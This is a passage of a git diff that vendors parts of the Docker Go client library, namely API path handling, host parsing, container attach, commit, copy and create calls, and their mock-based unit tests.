+		proto:             proto,
+		addr:              addr,
+		basePath:          basePath,
+		client:            client,
+		version:           version,
+		customHTTPHeaders: httpHeaders,
+	}, nil
+}
+
+// Close ensures that transport.Client is closed
+// especially needed while using NewClient with *http.Client = nil
+// for example
+// client.NewClient("unix:///var/run/docker.sock", nil, "v1.18", map[string]string{"User-Agent": "engine-api-cli-1.0"})
+func (cli *Client) Close() error {
+
+	if t, ok := cli.client.Transport.(*http.Transport); ok {
+		t.CloseIdleConnections()
+	}
+
+	return nil
+}
+
+// getAPIPath returns the versioned request path to call the api.
+// It appends the query parameters to the path if they are not empty.
+func (cli *Client) getAPIPath(p string, query url.Values) string {
+	var apiPath string
+	if cli.version != "" {
+		v := strings.TrimPrefix(cli.version, "v")
+		apiPath = fmt.Sprintf("%s/v%s%s", cli.basePath, v, p)
+	} else {
+		apiPath = fmt.Sprintf("%s%s", cli.basePath, p)
+	}
+
+	u := &url.URL{
+		Path: apiPath,
+	}
+	if len(query) > 0 {
+		u.RawQuery = query.Encode()
+	}
+	return u.String()
+}
+
+// ClientVersion returns the version string associated with this
+// instance of the Client. Note that this value can be changed
+// via the DOCKER_API_VERSION env var.
+func (cli *Client) ClientVersion() string {
+	return cli.version
+}
+
+// UpdateClientVersion updates the version string associated with this
+// instance of the Client.
+func (cli *Client) UpdateClientVersion(v string) {
+	if !cli.manualOverride {
+		cli.version = v
+	}
+
+}
+
+// ParseHost verifies that the given host strings is valid.
+func ParseHost(host string) (string, string, string, error) {
+	protoAddrParts := strings.SplitN(host, "://", 2)
+	if len(protoAddrParts) == 1 {
+		return "", "", "", fmt.Errorf("unable to parse docker host `%s`", host)
+	}
+
+	var basePath string
+	proto, addr := protoAddrParts[0], protoAddrParts[1]
+	if proto == "tcp" {
+		parsed, err := url.Parse("tcp://" + addr)
+		if err != nil {
+			return "", "", "", err
+		}
+		addr = parsed.Host
+		basePath = parsed.Path
+	}
+	return proto, addr, basePath, nil
+}
diff --git a/vendor/github.com/docker/docker/client/client_mock_test.go b/vendor/github.com/docker/docker/client/client_mock_test.go
new file mode 100644
index 0000000000..0ab935d536
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/client_mock_test.go
@@ -0,0 +1,45 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+)
+
+func newMockClient(doer func(*http.Request) (*http.Response, error)) *http.Client {
+	return &http.Client{
+		Transport: transportFunc(doer),
+	}
+}
+
+func errorMock(statusCode int, message string) func(req *http.Request) (*http.Response, error) {
+	return func(req *http.Request) (*http.Response, error) {
+		header := http.Header{}
+		header.Set("Content-Type", "application/json")
+
+		body, err := json.Marshal(&types.ErrorResponse{
+			Message: message,
+		})
+		if err != nil {
+			return nil, err
+		}
+
+		return &http.Response{
+			StatusCode: statusCode,
+			Body:       ioutil.NopCloser(bytes.NewReader(body)),
+			Header:     header,
+		}, nil
+	}
+}
+
+func plainTextErrorMock(statusCode int, message string) func(req *http.Request) (*http.Response, error) {
+	return func(req *http.Request) (*http.Response, error) {
+		return &http.Response{
+			StatusCode: statusCode,
+			Body:       ioutil.NopCloser(bytes.NewReader([]byte(message))),
+		}, nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/client_test.go b/vendor/github.com/docker/docker/client/client_test.go
new file mode 100644
index 0000000000..ee199c2bec
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/client_test.go
@@ -0,0 +1,283 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestNewEnvClient(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("skipping unix only test for windows")
+	}
+	cases := []struct {
+		envs            map[string]string
+		expectedError   string
+		expectedVersion string
+	}{
+		{
+			envs:            map[string]string{},
+			expectedVersion: DefaultVersion,
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_CERT_PATH": "invalid/path",
+			},
+			expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory. Make sure the key is not encrypted",
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_CERT_PATH": "testdata/",
+			},
+			expectedVersion: DefaultVersion,
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_CERT_PATH":  "testdata/",
+				"DOCKER_TLS_VERIFY": "1",
+			},
+			expectedVersion: DefaultVersion,
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_CERT_PATH": "testdata/",
+				"DOCKER_HOST":      "https://notaunixsocket",
+			},
+			expectedVersion: DefaultVersion,
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_HOST": "host",
+			},
+			expectedError: "unable to parse docker host `host`",
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_HOST": "invalid://url",
+			},
+			expectedVersion: DefaultVersion,
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_API_VERSION": "anything",
+			},
+			expectedVersion: "anything",
+		},
+		{
+			envs: map[string]string{
+				"DOCKER_API_VERSION": "1.22",
+			},
+			expectedVersion: "1.22",
+		},
+	}
+	for _, c := range cases {
+		recoverEnvs := setupEnvs(t, c.envs)
+		apiclient, err := NewEnvClient()
+		if c.expectedError != "" {
+			if err == nil {
+				t.Errorf("expected an error for %v", c)
+			} else if err.Error() != c.expectedError {
+				t.Errorf("expected an error %s, got %s, for %v", c.expectedError, err.Error(), c)
+			}
+		} else {
+			if err != nil {
+				t.Error(err)
+			}
+			version := apiclient.ClientVersion()
+			if version != c.expectedVersion {
+				t.Errorf("expected %s, got %s, for %v", c.expectedVersion, version, c)
+			}
+		}
+
+		if c.envs["DOCKER_TLS_VERIFY"] != "" {
+			// pedantic checking that this is handled correctly
+			tr := apiclient.client.Transport.(*http.Transport)
+			if tr.TLSClientConfig == nil {
+				t.Errorf("no tls config found when DOCKER_TLS_VERIFY enabled")
+			}
+
+			if tr.TLSClientConfig.InsecureSkipVerify {
+				t.Errorf("tls verification should be enabled")
+			}
+		}
+
+		recoverEnvs(t)
+	}
+}
+
+func setupEnvs(t *testing.T, envs map[string]string) func(*testing.T) {
+	oldEnvs := map[string]string{}
+	for key, value := range envs {
+		oldEnv := os.Getenv(key)
+		oldEnvs[key] = oldEnv
+		err := os.Setenv(key, value)
+		if err != nil {
+			t.Error(err)
+		}
+	}
+	return func(t *testing.T) {
+		for key, value := range oldEnvs {
+			err := os.Setenv(key, value)
+			if err != nil {
+				t.Error(err)
+			}
+		}
+	}
+}
+
+func TestGetAPIPath(t *testing.T) {
+	cases := []struct {
+		v string
+		p string
+		q url.Values
+		e string
+	}{
+		{"", "/containers/json", nil, "/containers/json"},
+		{"", "/containers/json", url.Values{}, "/containers/json"},
+		{"", "/containers/json", url.Values{"s": []string{"c"}}, "/containers/json?s=c"},
+		{"1.22", "/containers/json", nil, "/v1.22/containers/json"},
+		{"1.22", "/containers/json", url.Values{}, "/v1.22/containers/json"},
+		{"1.22", "/containers/json", url.Values{"s": []string{"c"}}, "/v1.22/containers/json?s=c"},
+		{"v1.22", "/containers/json", nil, "/v1.22/containers/json"},
+		{"v1.22", "/containers/json", url.Values{}, "/v1.22/containers/json"},
+		{"v1.22", "/containers/json", url.Values{"s": []string{"c"}}, "/v1.22/containers/json?s=c"},
+		{"v1.22", "/networks/kiwl$%^", nil, "/v1.22/networks/kiwl$%25%5E"},
+	}
+
+	for _, cs := range cases {
+		c, err := NewClient("unix:///var/run/docker.sock", cs.v, nil, nil)
+		if err != nil {
+			t.Fatal(err)
+		}
+		g := c.getAPIPath(cs.p, cs.q)
+		if g != cs.e {
+			t.Fatalf("Expected %s, got %s", cs.e, g)
+		}
+
+		err = c.Close()
+		if nil != err {
+			t.Fatalf("close client failed, error message: %s", err)
+		}
+	}
+}
+
+func TestParseHost(t *testing.T) {
+	cases := []struct {
+		host  string
+		proto string
+		addr  string
+		base  string
+		err   bool
+	}{
+		{"", "", "", "", true},
+		{"foobar", "", "", "", true},
+		{"foo://bar", "foo", "bar", "", false},
+		{"tcp://localhost:2476", "tcp", "localhost:2476", "", false},
+		{"tcp://localhost:2476/path", "tcp", "localhost:2476", "/path", false},
+	}
+
+	for _, cs := range cases {
+		p, a, b, e := ParseHost(cs.host)
+		if cs.err && e == nil {
+			t.Fatalf("expected error, got nil")
+		}
+		if !cs.err && e != nil {
+			t.Fatal(e)
+		}
+		if cs.proto != p {
+			t.Fatalf("expected proto %s, got %s", cs.proto, p)
+		}
+		if cs.addr != a {
+			t.Fatalf("expected addr %s, got %s", cs.addr, a)
+		}
+		if cs.base != b {
+			t.Fatalf("expected base %s, got %s", cs.base, b)
+		}
+	}
+}
+
+func TestUpdateClientVersion(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			splitQuery := strings.Split(req.URL.Path, "/")
+			queryVersion := splitQuery[1]
+			b, err := json.Marshal(types.Version{
+				APIVersion: queryVersion,
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	cases := []struct {
+		v string
+	}{
+		{"1.20"},
+		{"v1.21"},
+		{"1.22"},
+		{"v1.22"},
+	}
+
+	for _, cs := range cases {
+		client.UpdateClientVersion(cs.v)
+		r, err := client.ServerVersion(context.Background())
+		if err != nil {
+			t.Fatal(err)
+		}
+		if strings.TrimPrefix(r.APIVersion, "v") != strings.TrimPrefix(cs.v, "v") {
+			t.Fatalf("Expected %s, got %s", cs.v, r.APIVersion)
+		}
+	}
+}
+
+func TestNewEnvClientSetsDefaultVersion(t *testing.T) {
+	// Unset environment variables
+	envVarKeys := []string{
+		"DOCKER_HOST",
+		"DOCKER_API_VERSION",
+		"DOCKER_TLS_VERIFY",
+		"DOCKER_CERT_PATH",
+	}
+	envVarValues := make(map[string]string)
+	for _, key := range envVarKeys {
+		envVarValues[key] = os.Getenv(key)
+		os.Setenv(key, "")
+	}
+
+	client, err := NewEnvClient()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if client.version != DefaultVersion {
+		t.Fatalf("Expected %s, got %s", DefaultVersion, client.version)
+	}
+
+	expected := "1.22"
+	os.Setenv("DOCKER_API_VERSION", expected)
+	client, err = NewEnvClient()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if client.version != expected {
+		t.Fatalf("Expected %s, got %s", expected, client.version)
+	}
+
+	// Restore environment variables
+	for _, key := range envVarKeys {
+		os.Setenv(key, envVarValues[key])
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/client_unix.go b/vendor/github.com/docker/docker/client/client_unix.go
new file mode 100644
index 0000000000..89de892c85
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/client_unix.go
@@ -0,0 +1,6 @@
+// +build linux freebsd solaris openbsd darwin
+
+package client
+
+// DefaultDockerHost defines os specific default if DOCKER_HOST is unset
+const DefaultDockerHost = "unix:///var/run/docker.sock"
diff --git a/vendor/github.com/docker/docker/client/client_windows.go b/vendor/github.com/docker/docker/client/client_windows.go
new file mode 100644
index 0000000000..07c0c7a774
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/client_windows.go
@@ -0,0 +1,4 @@
+package client
+
+// DefaultDockerHost defines os specific default if DOCKER_HOST is unset
+const DefaultDockerHost = "npipe:////./pipe/docker_engine"
diff --git a/vendor/github.com/docker/docker/client/container_attach.go b/vendor/github.com/docker/docker/client/container_attach.go
new file mode 100644
index 0000000000..eea4682158
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_attach.go
@@ -0,0 +1,37 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerAttach attaches a connection to a container in the server.
+// It returns a types.HijackedConnection with the hijacked connection
+// and the a reader to get output. It's up to the called to close
+// the hijacked connection by calling types.HijackedResponse.Close.
+func (cli *Client) ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) {
+	query := url.Values{}
+	if options.Stream {
+		query.Set("stream", "1")
+	}
+	if options.Stdin {
+		query.Set("stdin", "1")
+	}
+	if options.Stdout {
+		query.Set("stdout", "1")
+	}
+	if options.Stderr {
+		query.Set("stderr", "1")
+	}
+	if options.DetachKeys != "" {
+		query.Set("detachKeys", options.DetachKeys)
+	}
+	if options.Logs {
+		query.Set("logs", "1")
+	}
+
+	headers := map[string][]string{"Content-Type": {"text/plain"}}
+	return cli.postHijacked(ctx, "/containers/"+container+"/attach", query, nil, headers)
+}
diff --git a/vendor/github.com/docker/docker/client/container_commit.go b/vendor/github.com/docker/docker/client/container_commit.go
new file mode 100644
index 0000000000..c766d62e40
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_commit.go
@@ -0,0 +1,53 @@
+package client
+
+import (
+	"encoding/json"
+	"errors"
+	"net/url"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/reference"
+	"golang.org/x/net/context"
+)
+
+// ContainerCommit applies changes into a container and creates a new tagged image.
+func (cli *Client) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) {
+	var repository, tag string
+	if options.Reference != "" {
+		distributionRef, err := distreference.ParseNamed(options.Reference)
+		if err != nil {
+			return types.IDResponse{}, err
+		}
+
+		if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical {
+			return types.IDResponse{}, errors.New("refusing to create a tag with a digest reference")
+		}
+
+		tag = reference.GetTagFromNamedRef(distributionRef)
+		repository = distributionRef.Name()
+	}
+
+	query := url.Values{}
+	query.Set("container", container)
+	query.Set("repo", repository)
+	query.Set("tag", tag)
+	query.Set("comment", options.Comment)
+	query.Set("author", options.Author)
+	for _, change := range options.Changes {
+		query.Add("changes", change)
+	}
+	if options.Pause != true {
+		query.Set("pause", "0")
+	}
+
+	var response types.IDResponse
+	resp, err := cli.post(ctx, "/commit", query, options.Config, nil)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_commit_test.go b/vendor/github.com/docker/docker/client/container_commit_test.go
new file mode 100644
index 0000000000..a844675368
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_commit_test.go
@@ -0,0 +1,96 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestContainerCommitError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerCommit(context.Background(), "nothing", types.ContainerCommitOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerCommit(t *testing.T) {
+	expectedURL := "/commit"
+	expectedContainerID := "container_id"
+	specifiedReference := "repository_name:tag"
+	expectedRepositoryName := "repository_name"
+	expectedTag := "tag"
+	expectedComment := "comment"
+	expectedAuthor := "author"
+	expectedChanges := []string{"change1", "change2"}
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			query := req.URL.Query()
+			containerID := query.Get("container")
+			if containerID != expectedContainerID {
+				return nil, fmt.Errorf("container id not set in URL query properly. Expected '%s', got %s", expectedContainerID, containerID)
+			}
+			repo := query.Get("repo")
+			if repo != expectedRepositoryName {
+				return nil, fmt.Errorf("container repo not set in URL query properly. Expected '%s', got %s", expectedRepositoryName, repo)
+			}
+			tag := query.Get("tag")
+			if tag != expectedTag {
+				return nil, fmt.Errorf("container tag not set in URL query properly. Expected '%s', got %s'", expectedTag, tag)
+			}
+			comment := query.Get("comment")
+			if comment != expectedComment {
+				return nil, fmt.Errorf("container comment not set in URL query properly. Expected '%s', got %s'", expectedComment, comment)
+			}
+			author := query.Get("author")
+			if author != expectedAuthor {
+				return nil, fmt.Errorf("container author not set in URL query properly. Expected '%s', got %s'", expectedAuthor, author)
+			}
+			pause := query.Get("pause")
+			if pause != "0" {
+				return nil, fmt.Errorf("container pause not set in URL query properly. Expected 'true', got %v'", pause)
+			}
+			changes := query["changes"]
+			if len(changes) != len(expectedChanges) {
+				return nil, fmt.Errorf("expected container changes size to be '%d', got %d", len(expectedChanges), len(changes))
+			}
+			b, err := json.Marshal(types.IDResponse{
+				ID: "new_container_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ContainerCommit(context.Background(), expectedContainerID, types.ContainerCommitOptions{
+		Reference: specifiedReference,
+		Comment:   expectedComment,
+		Author:    expectedAuthor,
+		Changes:   expectedChanges,
+		Pause:     false,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "new_container_id" {
+		t.Fatalf("expected `container_id`, got %s", r.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_copy.go b/vendor/github.com/docker/docker/client/container_copy.go
new file mode 100644
index 0000000000..8380eeabc9
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_copy.go
@@ -0,0 +1,97 @@
+package client
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"path/filepath"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+// ContainerStatPath returns Stat information about a path inside the container filesystem.
+func (cli *Client) ContainerStatPath(ctx context.Context, containerID, path string) (types.ContainerPathStat, error) {
+	query := url.Values{}
+	query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API.
+
+	urlStr := fmt.Sprintf("/containers/%s/archive", containerID)
+	response, err := cli.head(ctx, urlStr, query, nil)
+	if err != nil {
+		return types.ContainerPathStat{}, err
+	}
+	defer ensureReaderClosed(response)
+	return getContainerPathStatFromHeader(response.header)
+}
+
+// CopyToContainer copies content into the container filesystem.
+func (cli *Client) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error {
+	query := url.Values{}
+	query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API.
+	// Do not allow for an existing directory to be overwritten by a non-directory and vice versa.
+	if !options.AllowOverwriteDirWithFile {
+		query.Set("noOverwriteDirNonDir", "true")
+	}
+
+	apiPath := fmt.Sprintf("/containers/%s/archive", container)
+
+	response, err := cli.putRaw(ctx, apiPath, query, content, nil)
+	if err != nil {
+		return err
+	}
+	defer ensureReaderClosed(response)
+
+	if response.statusCode != http.StatusOK {
+		return fmt.Errorf("unexpected status code from daemon: %d", response.statusCode)
+	}
+
+	return nil
+}
+
+// CopyFromContainer gets the content from the container and returns it as a Reader
+// to manipulate it in the host. It's up to the caller to close the reader.
+func (cli *Client) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) {
+	query := make(url.Values, 1)
+	query.Set("path", filepath.ToSlash(srcPath)) // Normalize the paths used in the API.
+
+	apiPath := fmt.Sprintf("/containers/%s/archive", container)
+	response, err := cli.get(ctx, apiPath, query, nil)
+	if err != nil {
+		return nil, types.ContainerPathStat{}, err
+	}
+
+	if response.statusCode != http.StatusOK {
+		return nil, types.ContainerPathStat{}, fmt.Errorf("unexpected status code from daemon: %d", response.statusCode)
+	}
+
+	// In order to get the copy behavior right, we need to know information
+	// about both the source and the destination. The response headers include
+	// stat info about the source that we can use in deciding exactly how to
+	// copy it locally. Along with the stat info about the local destination,
+	// we have everything we need to handle the multiple possibilities there
+	// can be when copying a file/dir from one location to another file/dir.
+	stat, err := getContainerPathStatFromHeader(response.header)
+	if err != nil {
+		return nil, stat, fmt.Errorf("unable to get resource stat from response: %s", err)
+	}
+	return response.body, stat, err
+}
+
+func getContainerPathStatFromHeader(header http.Header) (types.ContainerPathStat, error) {
+	var stat types.ContainerPathStat
+
+	encodedStat := header.Get("X-Docker-Container-Path-Stat")
+	statDecoder := base64.NewDecoder(base64.StdEncoding, strings.NewReader(encodedStat))
+
+	err := json.NewDecoder(statDecoder).Decode(&stat)
+	if err != nil {
+		err = fmt.Errorf("unable to decode container path stat header: %s", err)
+	}
+
+	return stat, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_copy_test.go b/vendor/github.com/docker/docker/client/container_copy_test.go
new file mode 100644
index 0000000000..706a20c818
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_copy_test.go
@@ -0,0 +1,244 @@
+package client
+
+import (
+	"bytes"
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestContainerStatPathError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerStatPath(context.Background(), "container_id", "path")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestContainerStatPathNoHeaderError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	_, err := client.ContainerStatPath(context.Background(), "container_id", "path/to/file")
+	if err == nil {
+		t.Fatalf("expected an error, got nothing")
+	}
+}
+
+func TestContainerStatPath(t *testing.T) {
+	expectedURL := "/containers/container_id/archive"
+	expectedPath := "path/to/file"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "HEAD" {
+				return nil, fmt.Errorf("expected HEAD method, got %s", req.Method)
+			}
+			query := req.URL.Query()
+			path := query.Get("path")
+			if path != expectedPath {
+				return nil, fmt.Errorf("path not set in URL query properly")
+			}
+			content, err := json.Marshal(types.ContainerPathStat{
+				Name: "name",
+				Mode: 0700,
+			})
+			if err != nil {
+				return nil, err
+			}
+			base64PathStat := base64.StdEncoding.EncodeToString(content)
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+				Header: http.Header{
+					"X-Docker-Container-Path-Stat": []string{base64PathStat},
+				},
+			}, nil
+		}),
+	}
+	stat, err := client.ContainerStatPath(context.Background(), "container_id", expectedPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if stat.Name != "name" {
+		t.Fatalf("expected container path stat name to be 'name', got '%s'", stat.Name)
+	}
+	if stat.Mode != 0700 {
+		t.Fatalf("expected container path stat mode to be 0700, got '%v'", stat.Mode)
+	}
+}
+
+func TestCopyToContainerError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestCopyToContainerNotStatusOKError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNoContent, "No content")),
+	}
+	err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{})
+	if err == nil || err.Error() != "unexpected status code from daemon: 204" {
+		t.Fatalf("expected an unexpected status code error, got %v", err)
+	}
+}
+
+func TestCopyToContainer(t *testing.T) {
+	expectedURL := "/containers/container_id/archive"
+	expectedPath := "path/to/file"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "PUT" {
+				return nil, fmt.Errorf("expected PUT method, got %s", req.Method)
+			}
+			query := req.URL.Query()
+			path := query.Get("path")
+			if path != expectedPath {
+				return nil, fmt.Errorf("path not set in URL query properly, expected '%s', got %s", expectedPath, path)
+			}
+			noOverwriteDirNonDir := query.Get("noOverwriteDirNonDir")
+			if noOverwriteDirNonDir != "true" {
+				return nil, fmt.Errorf("noOverwriteDirNonDir not set in URL query properly, expected true, got %s", noOverwriteDirNonDir)
+			}
+
+			content, err := ioutil.ReadAll(req.Body)
+			if err != nil {
+				return nil, err
+			}
+			if err := req.Body.Close(); err != nil {
+				return nil, err
+			}
+			if string(content) != "content" {
+				return nil, fmt.Errorf("expected content to be 'content', got %s", string(content))
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	err := client.CopyToContainer(context.Background(), "container_id", expectedPath, bytes.NewReader([]byte("content")), types.CopyToContainerOptions{
+		AllowOverwriteDirWithFile: false,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestCopyFromContainerError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestCopyFromContainerNotStatusOKError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNoContent, "No content")),
+	}
+	_, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file")
+	if err == nil || err.Error() != "unexpected status code from daemon: 204" {
+		t.Fatalf("expected an unexpected status code error, got %v", err)
+	}
+}
+
+func TestCopyFromContainerNoHeaderError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+	_, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file")
+	if err == nil {
+		t.Fatalf("expected an error, got nothing")
+	}
+}
+
+func TestCopyFromContainer(t *testing.T) {
+	expectedURL := "/containers/container_id/archive"
+	expectedPath := "path/to/file"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "GET" {
+				return nil, fmt.Errorf("expected PUT method, got %s", req.Method)
+			}
+			query := req.URL.Query()
+			path := query.Get("path")
+			if path != expectedPath {
+				return nil, fmt.Errorf("path not set in URL query properly, expected '%s', got %s", expectedPath, path)
+			}
+
+			headercontent, err := json.Marshal(types.ContainerPathStat{
+				Name: "name",
+				Mode: 0700,
+			})
+			if err != nil {
+				return nil, err
+			}
+			base64PathStat := base64.StdEncoding.EncodeToString(headercontent)
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("content"))),
+				Header: http.Header{
+					"X-Docker-Container-Path-Stat": []string{base64PathStat},
+				},
+			}, nil
+		}),
+	}
+	r, stat, err := client.CopyFromContainer(context.Background(), "container_id", expectedPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if stat.Name != "name" {
+		t.Fatalf("expected container path stat name to be 'name', got '%s'", stat.Name)
+	}
+	if stat.Mode != 0700 {
+		t.Fatalf("expected container path stat mode to be 0700, got '%v'", stat.Mode)
+	}
+	content, err := ioutil.ReadAll(r)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := r.Close(); err != nil {
+		t.Fatal(err)
+	}
+	if string(content) != "content" {
+		t.Fatalf("expected content to be 'content', got %s", string(content))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_create.go b/vendor/github.com/docker/docker/client/container_create.go
new file mode 100644
index 0000000000..9f627aafa6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_create.go
@@ -0,0 +1,50 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+	"strings"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/network"
+	"golang.org/x/net/context"
+)
+
+type configWrapper struct {
+	*container.Config
+	HostConfig       *container.HostConfig
+	NetworkingConfig *network.NetworkingConfig
+}
+
+// ContainerCreate creates a new container based in the given configuration.
+// It can be associated with a name, but it's not mandatory.
+func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) {
+	var response container.ContainerCreateCreatedBody
+
+	if err := cli.NewVersionError("1.25", "stop timeout"); config != nil && config.StopTimeout != nil && err != nil {
+		return response, err
+	}
+
+	query := url.Values{}
+	if containerName != "" {
+		query.Set("name", containerName)
+	}
+
+	body := configWrapper{
+		Config:           config,
+		HostConfig:       hostConfig,
+		NetworkingConfig: networkingConfig,
+	}
+
+	serverResp, err := cli.post(ctx, "/containers/create", query, body, nil)
+	if err != nil {
+		if serverResp.statusCode == 404 && strings.Contains(err.Error(), "No such image") {
